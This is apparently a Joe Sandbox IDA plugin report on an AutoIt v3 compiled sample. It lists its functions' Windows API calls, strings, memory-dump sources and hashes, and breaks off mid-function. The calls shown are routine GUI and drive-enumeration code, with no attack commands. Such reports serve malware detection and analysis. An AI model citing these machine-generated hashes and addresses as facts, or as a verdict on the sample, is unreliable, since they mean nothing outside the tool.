AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 006479ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00647A35
GetClientRect.USER32(00000000,?), ref: 00647A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00647A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00647A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00647AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00647ABB
GlobalLock.KERNEL32(00000000), ref: 00647AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00647AD3
GlobalUnlock.KERNEL32(00000000), ref: 00647ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00647AE3
GlobalFree.KERNEL32(00000000), ref: 00647AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00647B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00662CAC,00000000), ref: 00647B16
GlobalFree.KERNEL32(00000000), ref: 00647B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00647B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00647B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00647B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00647D7A

Strings

DISPLAY, xrefs: 00647BDD
AutoIt v3, xrefs: 00647A2D
, xrefs: 00647D00
static, xrefs: 00647A75, 00647BCC

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 4aeddc2b6ce614d623428e002faec34fdcd2c4d85b668c7d88253c6860e39745
Instruction ID: a4c53988d29c1bb9bbd43bf0ee70147b3c68ad5f7ff622e655456b0dd4abb594
Opcode Fuzzy Hash: 4aeddc2b6ce614d623428e002faec34fdcd2c4d85b668c7d88253c6860e39745
Instruction Fuzzy Hash: E5024C71900215EFDB14DFA8DD89EAE7BBAFF48311F148159F915AB2A1CB70AD01CB60

Function 0065356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0065F910), ref: 00653627
IsWindowVisible.USER32(?), ref: 0065364B

Strings

ADDSTRING, xrefs: 00653716
UNCHECK, xrefs: 00653883
TABRIGHT, xrefs: 0065369D
HIDEDROPDOWN, xrefs: 00653700
GETCURRENTSELECTION, xrefs: 006537E3
GETLINECOUNT, xrefs: 006538C6
CURRENTTAB, xrefs: 006536BD
SHOWDROPDOWN, xrefs: 006536E0
ISENABLED, xrefs: 0065366B
SETCURRENTSELECTION, xrefs: 006537B6
TABLEFT, xrefs: 00653687
GETSELECTED, xrefs: 006538A3
ISVISIBLE, xrefs: 00653637
DELSTRING, xrefs: 00653749
GETCURRENTLINE, xrefs: 006538ED
FINDSTRING, xrefs: 00653776
SELECTSTRING, xrefs: 00653806
EDITPASTE, xrefs: 0065395F
GETLINE, xrefs: 0065399B
ISCHECKED, xrefs: 00653839
CHECK, xrefs: 0065386D
GETCURRENTCOL, xrefs: 00653928
SENDCOMMANDID, xrefs: 006539DA

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 5467ddaee256139e1f0888d593602ebaafd2d68ddd047ad3c55b00530b7da2f4
Instruction ID: 6b0ee26088c543bbaae27cb76208c08e4cdf7f58988727e175437bd873b3a8dd
Opcode Fuzzy Hash: 5467ddaee256139e1f0888d593602ebaafd2d68ddd047ad3c55b00530b7da2f4
Instruction Fuzzy Hash: 1BD18D702047129BCB14EF14C955AAE7BA3AF94B85F084459FC825B3E3DB21EE4ACB51

Function 0065A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0065A630
GetSysColorBrush.USER32(0000000F), ref: 0065A661
GetSysColor.USER32(0000000F), ref: 0065A66D
SetBkColor.GDI32(?,000000FF), ref: 0065A687
SelectObject.GDI32(?,00000000), ref: 0065A696
InflateRect.USER32(?,000000FF,000000FF), ref: 0065A6C1
GetSysColor.USER32(00000010), ref: 0065A6C9
CreateSolidBrush.GDI32(00000000), ref: 0065A6D0
FrameRect.USER32(?,?,00000000), ref: 0065A6DF
DeleteObject.GDI32(00000000), ref: 0065A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 0065A731
FillRect.USER32(?,?,00000000), ref: 0065A763
GetWindowLongW.USER32(?,000000F0), ref: 0065A78E

Part of subcall function 0065A8CA: GetSysColor.USER32(00000012), ref: 0065A903
Part of subcall function 0065A8CA: SetTextColor.GDI32(?,?), ref: 0065A907
Part of subcall function 0065A8CA: GetSysColorBrush.USER32(0000000F), ref: 0065A91D
Part of subcall function 0065A8CA: GetSysColor.USER32(0000000F), ref: 0065A928
Part of subcall function 0065A8CA: GetSysColor.USER32(00000011), ref: 0065A945
Part of subcall function 0065A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0065A953
Part of subcall function 0065A8CA: SelectObject.GDI32(?,00000000), ref: 0065A964
Part of subcall function 0065A8CA: SetBkColor.GDI32(?,00000000), ref: 0065A96D
Part of subcall function 0065A8CA: SelectObject.GDI32(?,?), ref: 0065A97A
Part of subcall function 0065A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0065A999
Part of subcall function 0065A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0065A9B0
Part of subcall function 0065A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0065A9C5
Part of subcall function 0065A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0065A9ED

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: fe2628c144bd2e66add20e450379b362b981820f1b533418b852d0644690edd1
Instruction ID: b9b73545b736ae584cf4bb8f349da43fe63df81e1c43b33a56147a638bdfa953
Opcode Fuzzy Hash: fe2628c144bd2e66add20e450379b362b981820f1b533418b852d0644690edd1
Instruction Fuzzy Hash: 31917C72008301EFC711DFA4DC08A5BBBAAFF89322F141B29F9A2961E1D771D945CB52

Function 005D2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 005D2CA2
DeleteObject.GDI32(00000000), ref: 005D2CE8
DeleteObject.GDI32(00000000), ref: 005D2CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 005D2CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 005D2D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 0060C43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0060C474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0060C89D

Part of subcall function 005D1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005D2036,?,00000000,?,?,?,?,005D16CB,00000000,?), ref: 005D1B9A

SendMessageW.USER32(?,00001053), ref: 0060C8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0060C8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0060C907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0060C912

Strings

0, xrefs: 0060C731

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 6388e75bd0167f24860846d7df80b636a56b005d3fab2cd7f2913ef9439866a9
Instruction ID: a18f0c1346f8f0eeabd6916c42f8f8a66320211f906d3e781265e627e1ad44b9
Opcode Fuzzy Hash: 6388e75bd0167f24860846d7df80b636a56b005d3fab2cd7f2913ef9439866a9
Instruction Fuzzy Hash: D3129030150201AFDB29CF28C894BAABBE6FF55321F54466AF855CB3A2C731EC51DB51

Function 006474AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 006474DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0064759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 006475DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 006475ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00647633
GetClientRect.USER32(00000000,?), ref: 0064763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00647683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00647692
GetStockObject.GDI32(00000011), ref: 006476A2
SelectObject.GDI32(00000000,00000000), ref: 006476A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 006476B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 006476BF
DeleteDC.GDI32(00000000), ref: 006476C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006476F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 0064770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00647746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0064775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 0064776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0064779B
GetStockObject.GDI32(00000011), ref: 006477A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 006477B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 006477BB

Strings

DISPLAY, xrefs: 00647688
AutoIt v3, xrefs: 0064762B
static, xrefs: 0064767D, 00647795
msctls_progress32, xrefs: 0064773C

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 9035790420c782a6f2491a896be5a92e4fe9a19a90510f5d727df5c8a30b1f46
Instruction ID: 5b285c37f70b2297aa0308eeb59b1b3da91bf97db26f43ecc5707d379b5b6d54
Opcode Fuzzy Hash: 9035790420c782a6f2491a896be5a92e4fe9a19a90510f5d727df5c8a30b1f46
Instruction Fuzzy Hash: A7A13171A40615BFEB14DFA8DD4AFAE7BBAEB48711F004115FA15A72E0DB70AD00CB64

Function 0063AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0063AD1E
GetDriveTypeW.KERNEL32(?,0065FAC0,?,\\.\,0065F910), ref: 0063ADFB
SetErrorMode.KERNEL32(00000000,0065FAC0,?,\\.\,0065F910), ref: 0063AF59

Strings

Unknown, xrefs: 0063AE1B, 0063AEBF
SCSI, xrefs: 0063AEC6
SATA, xrefs: 0063AF0C
SSD, xrefs: 0063AE86
1394, xrefs: 0063AEDB
SSA, xrefs: 0063AEE2
Virtual, xrefs: 0063AF21
\\.\, xrefs: 0063AD70
PhysicalDrive, xrefs: 0063ADA7
Fibre, xrefs: 0063AEE9
SAS, xrefs: 0063AF05
USB, xrefs: 0063AEF0
iSCSI, xrefs: 0063AEFE
FileBackedVirtual, xrefs: 0063AF28
RAID, xrefs: 0063AEF7
MMC, xrefs: 0063AF1A
Removable, xrefs: 0063AE4D
Network, xrefs: 0063AE39
ATA, xrefs: 0063AED4
ATAPI, xrefs: 0063AECD
Fixed, xrefs: 0063AE43
RAMDisk, xrefs: 0063AE25
CDROM, xrefs: 0063AE2F

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 75a823f07ed88f56cc9d060a581621b3ca0486a7c46633b8381f2f06645fcb44
Instruction ID: fb5d609bf3b75196a71a35bb8a1fdce0227c14017306189a5db92038191d9085
Opcode Fuzzy Hash: 75a823f07ed88f56cc9d060a581621b3ca0486a7c46633b8381f2f06645fcb44
Instruction Fuzzy Hash: A55170B4644205AF8B14EF94C942CBD77A3EF88700F61425BE486A73D1DA319D42FB82

Function 00659A1C Relevance: 44.2, APIs: 23, Strings: 2, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00659AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00659B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 00659BA7

Strings

P[, xrefs: 00659A6B, 00659EB2, 00659F00
0, xrefs: 00659BE4

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0$P[
API String ID: 2326795674-4179529919
Opcode ID: 611b0894d8788cd84fa30931772e910f93acf315c7ade1e418cbbc47e752aee9
Instruction ID: bd555e85d5f5da1ed8b342bc3db3ef29e731b7599f2e8cc34b26a88b69def4b8
Opcode Fuzzy Hash: 611b0894d8788cd84fa30931772e910f93acf315c7ade1e418cbbc47e752aee9
Instruction Fuzzy Hash: 1602BC30104301EFDB25CF24C949BAABBE6FF49316F04862DF999962A1C774D949CB62

Function 005D68DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 005D6931
__wcsnicmp.LIBCMT ref: 005D6949
__wcsnicmp.LIBCMT ref: 005D6961
__wcsnicmp.LIBCMT ref: 005D6979
__wcsnicmp.LIBCMT ref: 005D6991
__wcsnicmp.LIBCMT ref: 005D69A9
__wcsnicmp.LIBCMT ref: 005D69C1
__wcsnicmp.LIBCMT ref: 005D69D5
__wcsnicmp.LIBCMT ref: 005D6A16
__wcsnicmp.LIBCMT ref: 005D6A2A
__wcsnicmp.LIBCMT ref: 005D6A3E
__wcsnicmp.LIBCMT ref: 005D6A52

Strings

#ce, xrefs: 005D6A4C
Cannot parse #include, xrefs: 0060E3F0
#OnAutoItStartRegister, xrefs: 005D6973
#include, xrefs: 005D69A3
#comments-end, xrefs: 005D6A38
#notrayicon, xrefs: 005D6943
Unterminated group of comments, xrefs: 0060E403
Bad directive syntax error, xrefs: 0060E31A
#pragma compile, xrefs: 005D692B
#comments-start, xrefs: 005D69BB, 005D6A10
#include-once, xrefs: 005D698B
#cs, xrefs: 005D69CF, 005D6A24
#requireadmin, xrefs: 005D695B

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: dfb085bd03aace0ba601ce139364cb8e91f9684b9aa8c84da492aa809a9da725
Instruction ID: c9f4854595a069d75eda43880f87a482d750163a7a9e3e9a9cd75824f698a5a3
Opcode Fuzzy Hash: dfb085bd03aace0ba601ce139364cb8e91f9684b9aa8c84da492aa809a9da725
Instruction Fuzzy Hash: 968118B164021AAADB34BB64DC56FBB3F6AFF44740F040027FD41AA2D2EB61DA46C251

Function 006589D5 Relevance: 40.7, APIs: 21, Strings: 2, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00658AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00658AD2
CharNextW.USER32(0000014E), ref: 00658B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00658B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00658B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00658B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00658B86
SetWindowTextW.USER32(?,0000014E), ref: 00658BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00658BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00658C1F
_memset.LIBCMT ref: 00658C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00658C8D
_memset.LIBCMT ref: 00658CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00658D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00658D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00658E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00658E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00658E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00658EB4
DrawMenuBar.USER32(?), ref: 00658EC3
SetWindowTextW.USER32(?,0000014E), ref: 00658EEB

Strings

P[, xrefs: 00658A23
0, xrefs: 00658E55

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0$P[
API String ID: 1073566785-4179529919
Opcode ID: 0ce20b68825199e522c42d69b6a4db907618e4f26b3cee4cdbe6315267f4eeff
Instruction ID: a79153cbc1a8c8768cc635aceacc59ca76736611040534b6273d7b26b8ec1f35
Opcode Fuzzy Hash: 0ce20b68825199e522c42d69b6a4db907618e4f26b3cee4cdbe6315267f4eeff
Instruction Fuzzy Hash: 38E15D70900209EEDF20DF54CC84AEE7BBAEF09751F10815AFD15AB691DB748A89DF60

Function 0065A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0065A903
SetTextColor.GDI32(?,?), ref: 0065A907
GetSysColorBrush.USER32(0000000F), ref: 0065A91D
GetSysColor.USER32(0000000F), ref: 0065A928
CreateSolidBrush.GDI32(?), ref: 0065A92D
GetSysColor.USER32(00000011), ref: 0065A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0065A953
SelectObject.GDI32(?,00000000), ref: 0065A964
SetBkColor.GDI32(?,00000000), ref: 0065A96D
SelectObject.GDI32(?,?), ref: 0065A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 0065A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0065A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 0065A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0065A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0065AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 0065AA32
DrawFocusRect.USER32(?,?), ref: 0065AA3D
GetSysColor.USER32(00000011), ref: 0065AA4B
SetTextColor.GDI32(?,00000000), ref: 0065AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0065AA67
SelectObject.GDI32(?,0065A5FA), ref: 0065AA7E
DeleteObject.GDI32(?), ref: 0065AA89
SelectObject.GDI32(?,?), ref: 0065AA8F
DeleteObject.GDI32(?), ref: 0065AA94
SetTextColor.GDI32(?,?), ref: 0065AA9A
SetBkColor.GDI32(?,?), ref: 0065AAA4

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: b2d3b728214a51cff909b2c908e4b9c06f210e8fdcbbb9c808b71e6d604869f7
Instruction ID: 9eeb52bf4e2500782e9f0b5a6dbac267745715ffa96208d90c2fb554e554cd68
Opcode Fuzzy Hash: b2d3b728214a51cff909b2c908e4b9c06f210e8fdcbbb9c808b71e6d604869f7
Instruction Fuzzy Hash: 02513B71900218EFDB11DFA4DC48EAEBBBAFB48322F115225F911AB2A1D7759940DB90

Function 0065488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 006549CA
GetDesktopWindow.USER32 ref: 006549DF
GetWindowRect.USER32(00000000), ref: 006549E6
GetWindowLongW.USER32(?,000000F0), ref: 00654A48
DestroyWindow.USER32(?), ref: 00654A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00654A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00654ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00654AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00654AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00654B09
IsWindowVisible.USER32(?), ref: 00654B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00654B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00654B58
GetWindowRect.USER32(?,?), ref: 00654B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00654B96
GetMonitorInfoW.USER32(00000000,?), ref: 00654BB0
CopyRect.USER32(?,?), ref: 00654BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00654C32

Strings

